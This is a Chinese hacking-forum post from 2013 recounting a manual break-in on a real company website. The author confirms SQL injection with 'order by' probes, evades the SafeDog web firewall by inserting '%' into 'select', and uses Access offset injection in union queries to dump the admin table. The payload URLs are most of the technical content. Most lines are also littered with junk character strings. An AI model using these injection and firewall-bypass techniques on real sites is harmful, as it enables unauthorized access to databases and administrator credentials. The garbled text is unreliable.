找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2047|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
打开网站,一个企业站。
' {& D: f- ?( E
+ c8 J' @. \8 ?9 U+ ?: A4 v$ u- L' w* l' R/ O# ~) S# D
顺手加个admin( ?2 n" l! f3 @. z  Z; z8 g
' p  c! K/ I0 J6 ^6 C8 c

" j# b) d! d( n+ {# p. i默认后台。3 z+ f& _! b6 H* _& ~, d. I
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​
& j( e; J+ M  [1 P$ u4 ]. |" l- C# D9 D7 N
4 [8 Y& p  o' Z; D( V3 u4 @! ?' Y
" L# J: V- j0 }
所以就不用御剑扫了,待会直接封IP。
+ l/ O) s1 C9 z3 _% Q; l
' D3 B& G. F/ Q  D8 b1 S+ j9 p用order by语句判断是否存在注入。- y- ~* w* }% D
http://www.xxx.com /product_show.asp?id=997 order by 1: a. `$ g+ d2 t6 u7 S
http://www.xxx.com /product_show.asp?id=997 order by 1000 t, M, N% U+ p; S' ]+ t' M
现在存在注入,经测试后发现是9个字段。. P% |8 ^7 |( T! ^6 ]8 u/ F
5 |- H/ H/ I$ O. ^' \) S4 D
接下来进行联合查询,猜是否存在admin表。
" o! E+ Z1 d' O, `& Jhttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​
' Q# w* T. a5 `) ]# Y0 A5 m7 F  r. \9 k1 X

! U. e/ D% m% d' ?( L+ a
5 C  }! t4 t# e' p8 ?' M在select中间加个%,se%lect绕过安全狗。
  k% J( C% ~5 ~& @' t
7 J  F6 |+ o; o: T( [4 @- I3 ^$ [8 H2 d9 `: U5 A
发现存在admin表,然后开始手工猜常用的字段。
' ~. S5 m  L6 A. b纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。; Z- O( Q. R, R0 b4 Y6 c. R

3 U0 [& Q# v5 a; J突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
5 Z3 B8 D' i3 e$ U/ @! Y 5 G* Z# y* F3 ]* b, W
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
+ W3 D5 A: A+ K5 d  whttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
: D" p# E2 E3 v; C' p$ Z4 ^好了,敏感内容出显了。​
6 P3 ?: W2 r5 D) r# }5 F' G
3 E$ W) z5 _& G( ?: p8 f( w
3 |, ?7 {0 b& i# a: a" v1 I& S* d8 Y8 Q5 }% |
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表